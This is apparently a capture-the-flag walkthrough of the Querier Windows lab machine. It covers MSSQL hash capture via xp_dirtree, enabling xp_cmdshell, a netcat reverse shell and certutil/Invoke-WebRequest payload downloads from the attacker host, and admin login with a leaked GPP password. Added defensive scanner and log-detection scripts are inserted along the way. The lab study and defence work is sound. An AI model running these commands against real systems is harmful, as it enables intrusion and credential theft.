#hackthebox #windows #medium #MSSQL #PowerUp

![[Pasted image 20250803231113.png]]

# Information Gathering - Nmap

I scanned all TCP ports and discovered 14 open ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 00:45 UTC
Nmap scan report for 10.10.10.125
Host is up (0.055s latency).
Not shown: 65514 closed tcp ports (reset), 7 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 16.98 seconds
```

I performed another TCP scan against those open ports to gather more information.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 135,139,445,1433,5985,47001,49664,49665,49666,49667,49668,49669,49670,49671
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 00:47 UTC
Nmap scan report for 10.10.10.125
Host is up (0.049s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.10.125:1433: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: QUERIER
|     DNS_Domain_Name: HTB.LOCAL
|     DNS_Computer_Name: QUERIER.HTB.LOCAL
|     DNS_Tree_Name: HTB.LOCAL
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-08-04T00:48:29+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-08-04T00:43:52
|_Not valid after:  2055-08-04T00:43:52
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-08-04T00:48:24
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.83 seconds
```

Lastly, I scanned the top 10 UDP ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-04 00:51 UTC
Nmap scan report for 10.10.10.125
Host is up (0.052s latency).

PORT     STATE         SERVICE
53/udp   closed        domain
67/udp   closed        dhcps
123/udp  open|filtered ntp
135/udp  open|filtered msrpc
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
161/udp  open|filtered snmp
445/udp  closed        microsoft-ds
631/udp  closed        ipp
1434/udp closed        ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 7.01 seconds
```

---

# Enumeration

##### SMB - TCP 139, 445

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N -L //$IP

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Reports         Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N //$IP/Reports
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 28 23:23:48 2019
  ..                                  D        0  Mon Jan 28 23:23:48 2019
  Currency Volume Report.xlsm         A    12229  Sun Jan 27 22:21:34 2019

		5158399 blocks of size 4096. 852655 blocks available
```

I downloaded the file and opened it with `libreoffice`, but the file didn't have any information.

![[Pasted image 20250803200906.png]]

`exiftool` revealed that the creator of this file was `Luis`. At least we got something out of the file.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ exiftool Currency\ Volume\ Report.xlsm
ExifTool Version Number         : 13.25
File Name                       : Currency Volume Report.xlsm
Directory                       : .
File Size                       : 12 kB
File Modification Date/Time     : 2025:08:04 00:56:28+00:00
File Access Date/Time           : 2025:08:04 00:57:18+00:00
File Inode Change Date/Time     : 2025:08:04 00:56:28+00:00
File Permissions                : -rw-r--r--
File Type                       : XLSM
File Type Extension             : xlsm
MIME Type                       : application/vnd.ms-excel.sheet.macroEnabled.12
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x513599ac
Zip Compressed Size             : 367
Zip Uncompressed Size           : 1087
Zip File Name                   : [Content_Types].xml
Creator                         : Luis
Last Modified By                : Luis
Create Date                     : 2019:01:21 20:38:56Z
Modify Date                     : 2019:01:27 22:21:34Z
Application                     : Microsoft Excel
Doc Security                    : None
Scale Crop                      : No
Heading Pairs                   : Worksheets, 1
Titles Of Parts                 : Currency Volume
Company                         : 
Links Up To Date                : No
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 16.0300
```

I was skeptical that the `Currency Volume Report.xlsm` file really contained no information, so I opened and closed it several times, and then I noticed a warning about `Macros`.

![[Pasted image 20250803201808.png]]

I clicked on `Show Macros` and discovered a set of credentials, which appear to be valid on MSSQL.

![[Pasted image 20250803201657.png]]

# Initial Access - Shell as `mssql-svc`

I connected to `MSSQL` with the credentials I had found. Make sure to use `-windows-auth`; otherwise you will not be authenticated.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-mssqlclient reporting:'PcwTWTHRwryjc$c6'@$IP -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL (QUERIER\reporting  reporting@volume)> 
```

`xp_cmdshell` was denied, and the current user is not allowed to run the `enable_xp_cmdshell` command. At this point, I think it's a good idea to attempt to grab a user's NTLM hash using `xp_dirtree` + `responder`.

```bash
SQL (QUERIER\reporting  reporting@volume)> xp_cmdshell whoami
ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (QUERIER\reporting  reporting@volume)> enable_xp_cmdshell
ERROR(QUERIER): Line 105: User does not have permission to perform this action.
ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(QUERIER): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
```

I captured `mssql-svc`'s NTLM hash.

![[Pasted image 20250803210626.png]]

`hashcat`'s example hashes page tells us the mode for an NTLMv2 hash: `5600`.

![[Pasted image 20250803211329.png]]

Successfully cracked the hash.

![[Pasted image 20250803211511.png]]

With `mssql-svc:corporate568`, I logged back into `MSSQL` using `impacket-mssqlclient` and the valid credentials I had just found.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-mssqlclient mssql-svc:'corporate568'@$IP -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL (QUERIER\mssql-svc  dbo@master)> 
```

This time the error message for `xp_cmdshell` was different, and I was able to enable it.

```bash
SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell whoami
ERROR(QUERIER): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (QUERIER\mssql-svc  dbo@master)> enable_xp_cmdshell
INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (QUERIER\mssql-svc  dbo@master)> 
```

```bash
SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell whoami
output              
-----------------   
querier\mssql-svc   

NULL                

SQL (QUERIER\mssql-svc  dbo@master)> 
```

![[Pasted image 20250803214911.png]]

- `Pane 1` runs `xp_cmdshell`, fetches `nc64.exe` and executes it; the binary launches `cmd.exe` and connects to `10.10.14.14:443`, which is `Pane 3`.
- `Pane 2` hosts an SMB server and hands out the `nc64.exe` binary to `Pane 1`.
- `Pane 3` listens for the reverse shell connection. When the target's `nc.exe` connects on port 443, it binds the input and output of `cmd.exe` to that TCP connection.

![[Pasted image 20250803220654.png]]

Got the shell.

```powershell
┌──(kali㉿kali)-[~/Desktop]
└─$ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.125] 49690
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
querier\mssql-svc
```

Found `user.txt` in `C:\Users\mssql-svc\Desktop`.

```powershell
 Directory of C:\Users\mssql-svc\Desktop

01/29/2019  12:42 AM    <DIR>          .
01/29/2019  12:42 AM    <DIR>          ..
08/04/2025  01:44 AM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,479,777,280 bytes free

C:\Users\mssql-svc\Desktop>type user.txt
type user.txt
5d1...
```

# Privilege Escalation

```powershell
C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

PowerShell blocked the `certutil` download as malicious content, so I fetched the binary with `Invoke-WebRequest` instead.

```powershell
PS C:\Users\Public> certutil -urlcache -split -f http://10.10.14.14:443/JuicyPotato.exe JuicyPotato.exe
certutil -urlcache -split -f http://10.10.14.14:443/JuicyPotato.exe JuicyPotato.exe
At line:1 char:1
+ certutil -urlcache -split -f http://10.10.14.14:443/JuicyPotato.exe J ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
```

```powershell
PS C:\Users\Public> Invoke-WebRequest -Uri http://10.10.14.14:443/JuicyPotato.exe -outfile JuicyPotato.exe
Invoke-WebRequest -Uri http://10.10.14.14:443/JuicyPotato.exe -outfile JuicyPotato.exe
PS C:\Users\Public> dir
dir


    Directory: C:\Users\Public


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        1/28/2019  10:16 PM                Documents
d-r---        9/15/2018   8:19 AM                Downloads
d-r---        9/15/2018   8:19 AM                Music
d-r---        9/15/2018   8:19 AM                Pictures
d-----         8/4/2025   4:41 AM                Temp
d-r---        9/15/2018   8:19 AM                Videos
-a----         8/4/2025   4:43 AM              7 hello.txt
-a----         8/4/2025   4:45 AM         347648 JuicyPotato.exe
```

I tried `Juicy Potato` multiple times, but it failed every time.

```powershell
PS C:\Users\Public> ./JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *
./JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
COM -> recv failed with error: 10038
```

There was an `Unattend.xml` in `C:\Windows\Panther`, but it didn't expose any passwords.
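The two places a cleartext local-admin credential survives on a box like this are the Unattend.xml check above and the cached Group Policy Preferences Groups.xml that PowerUp reports further down. As an added example that is not part of the original write-up, the Python script below is the defender-side sweep for both: it parses unattend.xml, ignores the `*SENSITIVE*DATA*DELETED*` marker shown above, decodes the base64/UTF-16LE form Windows uses when `<PlainText>` is false (the element name is appended before encoding), and flags any GPP XML element that still carries a `cpassword` attribute. The sample XML documents are constructed; the account name and `changed` timestamp in the Groups.xml sample are taken from the PowerUp output on this page, and the cpassword blob is a placeholder.

```python
import base64
import xml.etree.ElementTree as ET

# Marker Windows Setup writes over passwords in C:\Windows\Panther\unattend.xml.
REDACTED = "*SENSITIVE*DATA*DELETED*"
# GPP preference files that can carry a cpassword attribute.
GPP_FILES = ("Groups.xml", "Services.xml", "ScheduledTasks.xml", "DataSources.xml", "Printers.xml", "Drives.xml")


def _local(tag):
    """Strip the XML namespace: '{urn:...}Password' -> 'Password'."""
    return tag.rsplit("}", 1)[-1]


def _child(elem, name):
    return next((c for c in elem if _local(c.tag) == name), None)


def decode_unattend_value(value, element_name):
    """Undo the unattend.xml encoding: base64 of UTF-16LE(password + element name)."""
    text = base64.b64decode(value).decode("utf-16-le")
    return text[: -len(element_name)] if text.endswith(element_name) else text


def scan_unattend(xml_text):
    """Return every *Password element whose value is neither empty nor redacted."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        name = _local(elem.tag)
        if not name.endswith("Password"):
            continue
        value_elem = _child(elem, "Value")
        raw = ((value_elem.text if value_elem is not None else elem.text) or "").strip()
        if not raw or raw == REDACTED:
            continue
        plain = _child(elem, "PlainText")
        encoded = plain is not None and (plain.text or "").strip().lower() == "false"
        findings.append({"kind": "unattend", "element": name, "encoded": encoded,
                         "password": decode_unattend_value(raw, name) if encoded else raw})
    return findings


def scan_gpp(xml_text):
    """Report every element with a non-empty cpassword. The AES key protecting cpassword is
    public, so a readable copy (SYSVOL or the local GPP history cache) is a cleartext credential."""
    root = ET.fromstring(xml_text)
    parent_of = {c: p for p in root.iter() for c in p}
    findings = []
    for elem in root.iter():
        if not elem.attrib.get("cpassword"):
            continue
        owner = parent_of.get(elem, elem)  # <User>/<Service>/... wrapping <Properties>
        findings.append({
            "kind": "gpp",
            "account": elem.attrib.get("userName") or elem.attrib.get("accountName")
                       or elem.attrib.get("runAs") or owner.attrib.get("name"),
            "new_name": elem.attrib.get("newName", ""),
            "changed": owner.attrib.get("changed", ""),
        })
    return findings


def _encode(password, element_name):
    """Build the encoded form for the constructed sample (and for round-trip testing)."""
    return base64.b64encode((password + element_name).encode("utf-16-le")).decode("ascii")


# Constructed sample: what Setup leaves behind once it has scrubbed the file.
SAMPLE_UNATTEND_REDACTED = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem"><component name="Microsoft-Windows-Shell-Setup">
    <UserAccounts><AdministratorPassword>
      <Value>*SENSITIVE*DATA*DELETED*</Value><PlainText>false</PlainText>
    </AdministratorPassword></UserAccounts>
    <AutoLogon><Password>*SENSITIVE*DATA*DELETED*</Password></AutoLogon>
  </component></settings></unattend>"""

# Constructed sample: an unscrubbed copy with one encoded and one plaintext password.
SAMPLE_UNATTEND_LEAKY = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem"><component name="Microsoft-Windows-Shell-Setup">
    <UserAccounts><AdministratorPassword>
      <Value>{admin}</Value><PlainText>false</PlainText>
    </AdministratorPassword></UserAccounts>
    <AutoLogon><Password><Value>Constructed-Logon-2</Value><PlainText>true</PlainText></Password></AutoLogon>
  </component></settings></unattend>""".format(admin=_encode("Constructed-Admin-1", "AdministratorPassword"))

# Constructed Groups.xml in the GPP layout; cpassword is a placeholder, not a real blob.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CONSTRUCTED-UID}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="CONSTRUCTED_BASE64_CPASSWORD_BLOB" changeLogon="0" noChange="0"
                neverExpires="0" acctDisabled="0" userName="Administrator"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    for doc in (SAMPLE_UNATTEND_REDACTED, SAMPLE_UNATTEND_LEAKY):
        print("unattend:", scan_unattend(doc))
    print("gpp:", scan_gpp(SAMPLE_GROUPS_XML))
```

Point `scan_unattend` at every copy of `unattend.xml`, `autounattend.xml` and `sysprep.xml` under `C:\Windows\Panther` and its subfolders, and `scan_gpp` at the files named in `GPP_FILES` both in SYSVOL and in the local cache under `C:\ProgramData` that PowerUp searches. A hit in `scan_gpp` means the password must be rotated, not just the file removed: anyone who could read the share or the cache already has it.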
```powershell
    Directory: C:\windows\panther


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/29/2019   6:16 AM                actionqueue
d-----        1/29/2019   6:15 AM                setup.exe
d-----        1/29/2019   6:15 AM                UnattendGC
-a----        1/29/2019   6:15 AM          44909 cbs.log
-a----        1/29/2019   6:15 AM          43273 cbs_unattend.log
-a----        1/29/2019   6:15 AM             68 Contents0.dir
-a----        1/29/2019   6:16 AM             68 Contents1.dir
-a----        1/29/2019   6:16 AM           1221 DDACLSys.log
-a----        1/29/2019   6:16 AM           6016 diagerr.xml
-a----        1/29/2019   6:16 AM          21536 diagwrn.xml
-a----        1/29/2019   6:15 AM          28834 MainQueueOnline0.que
-a----        1/29/2019   6:16 AM          27478 MainQueueOnline1.que
-a----         8/4/2025   1:43 AM         311296 setup.etl
-a----        1/28/2019  10:18 PM         415520 setupact.log
-a----        1/29/2019   6:12 AM            116 setuperr.log
-a----        1/29/2019   6:16 AM         250112 setupinfo
-a----        1/28/2019  10:16 PM           5211 unattend.xml

PS C:\windows\panther> type unattend.xml | findstr /i password
type unattend.xml | findstr /i password
                    <Password>*SENSITIVE*DATA*DELETED*</Password>
                    <Password>*SENSITIVE*DATA*DELETED*</Password>
```

At this point, manually looking for privesc vectors was getting tiring, so I transferred `PowerUp.ps1` to the target through the reverse shell.

![[Pasted image 20250803230313.png]]

It was so easy! It enumerated 5 vectors, including 2 I had already found.

![[Pasted image 20250803230635.png]]

```powershell
Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group \{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Check     : Cached GPP Files
```

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-psexec Administrator:'MyUnclesAreMarioAndLuigi!!1!'@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$
[*] Uploading file OVjxquqn.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service WbiF on 10.10.10.125.....
[*] Starting service WbiF.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

```powershell
C:\Users\Administrator\Desktop> type root.txt
807...
```

Of course, both `wmiexec` and `evil-winrm` also work.

```powershell
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-wmiexec Administrator:'MyUnclesAreMarioAndLuigi!!1!'@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
querier\administrator
```

```powershell
┌──(kali㉿kali)-[~/Desktop]
└─$ evil-winrm -i $IP -u Administrator -p 'MyUnclesAreMarioAndLuigi!!1!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
querier\administrator
```
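Looking back at the MSSQL part of this box, every step the attacker took left a trace the server itself emits: `xp_dirtree` with a UNC path from the low-privilege `reporting` login, then `enable_xp_cmdshell` from `mssql-svc`, which produced the `Configuration option 'show advanced options' changed from 0 to 1` and `Configuration option 'xp_cmdshell' changed from 0 to 1` notices shown above. The same notices land in the SQL Server ERRORLOG, as does an informational line the first time an extended procedure's DLL is loaded. As an added example (not part of the original write-up), the Python script below parses ERRORLOG-style lines for those events and audits an `sp_configure` snapshot for the dangerous options. The ERRORLOG line layout (`<date> <time> <spid or source> <message>`) is assumed here, and the sample lines are constructed: their message texts follow the notices on this page, the timestamps and spids are invented.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# ERRORLOG line layout assumed here: "<date> <time> <source> <message>", where <source> is
# a spid or a subsystem name such as "Server" or "Logon".
ERRORLOG_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<src>\S+)\s+(?P<msg>.+)$"
)
# sp_configure's change notice (the text the mssqlclient session on this page received).
CONFIG_CHANGE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)"
)
# Informational notice written the first time an extended procedure's DLL is used.
XP_FIRST_USE = re.compile(r"to execute extended stored procedure '(?P<xp>[^']+)'")

# Options that give any sysadmin login the service account's OS or network context.
DANGEROUS_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled", "Ad Hoc Distributed Queries"}
# xp_cmdshell runs OS commands; the others accept UNC paths and make the service account
# authenticate outbound, which is exactly how the mssql-svc hash was captured on this box.
WATCHED_XPS = {"xp_cmdshell": "high", "xp_dirtree": "medium", "xp_fileexist": "medium", "xp_subdirs": "medium"}


@dataclass
class Finding:
    severity: str
    kind: str       # "config_change" or "xp_first_use"
    detail: str
    source: str     # spid that triggered it, for correlation with login auditing
    timestamp: str


def classify_change(option: str, old: int, new: int) -> Optional[str]:
    """Severity of an sp_configure change, or None if it is not interesting."""
    if option in DANGEROUS_OPTIONS and old == 0 and new == 1:
        return "high"
    if option == "show advanced options" and new == 1:
        return "medium"   # prerequisite step of the enable_xp_cmdshell sequence
    if option in DANGEROUS_OPTIONS and new == 0:
        return "info"     # option switched back off
    return None


def scan_errorlog(lines) -> List[Finding]:
    findings: List[Finding] = []
    for raw in lines:
        m = ERRORLOG_LINE.match(raw.rstrip())
        if not m:
            continue
        ts, src, msg = m.group("ts"), m.group("src"), m.group("msg")
        c = CONFIG_CHANGE.search(msg)
        if c:
            sev = classify_change(c.group("option"), int(c.group("old")), int(c.group("new")))
            if sev:
                findings.append(Finding(sev, "config_change",
                                        f"{c.group('option')}: {c.group('old')} -> {c.group('new')}", src, ts))
            continue
        x = XP_FIRST_USE.search(msg)
        if x and x.group("xp") in WATCHED_XPS:
            findings.append(Finding(WATCHED_XPS[x.group("xp")], "xp_first_use", x.group("xp"), src, ts))
    return findings


def audit_sp_configure(rows):
    """rows: (name, config_value, run_value) tuples as EXEC sp_configure returns them.
    Returns the dangerous options whose configured or running value is not 0."""
    return [(name, cfg, run) for name, cfg, run in rows
            if name in DANGEROUS_OPTIONS and (cfg, run) != (0, 0)]


def remediation_tsql(name: str) -> str:
    """T-SQL that turns a drifted option back off."""
    return f"EXEC sp_configure '{name}', 0; RECONFIGURE;"


# Constructed sample ERRORLOG lines (not taken from the target).
SAMPLE_ERRORLOG = """\
2025-08-04 00:50:00.00 Server      SQL Server is now ready for client connections. This is an informational message; no user action is required.
2025-08-04 00:52:31.40 spid52      Using 'xpstar.dll' version '2017.140.1000' to execute extended stored procedure 'xp_dirtree'. This is an informational message only; no user action is required.
2025-08-04 00:55:10.12 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-08-04 00:55:10.15 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-08-04 00:55:18.02 spid55      Using 'xpstar.dll' version '2017.140.1000' to execute extended stored procedure 'xp_cmdshell'. This is an informational message only; no user action is required.
2025-08-04 01:10:00.00 spid60      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# Constructed sp_configure snapshots: the state right after enable_xp_cmdshell, and the hardened one.
SAMPLE_SP_CONFIGURE_WEAK = [("show advanced options", 1, 1), ("xp_cmdshell", 1, 1), ("clr enabled", 0, 0)]
SAMPLE_SP_CONFIGURE_HARDENED = [("show advanced options", 0, 0), ("xp_cmdshell", 0, 0), ("clr enabled", 0, 0)]

if __name__ == "__main__":
    for f in scan_errorlog(SAMPLE_ERRORLOG.splitlines()):
        print(f"[{f.severity:6}] {f.timestamp} {f.source} {f.kind}: {f.detail}")
    for name, cfg, run in audit_sp_configure(SAMPLE_SP_CONFIGURE_WEAK):
        print(f"drift: {name} config={cfg} run={run}  fix: {remediation_tsql(name)}")
```

The first-use notice only fires once per DLL load after a service restart, so treat it as a weak signal and rely on the configuration-change notices (or SQL Server Audit on `xp_dirtree`/`xp_cmdshell` execution) for alerting. The two root causes on this box are also the fixes: the `reporting` login had EXECUTE on `xp_dirtree`, which lets any low-privilege login coerce the service account into authenticating to an arbitrary UNC path, and the service account was sysadmin, which let it turn `xp_cmdshell` on by itself.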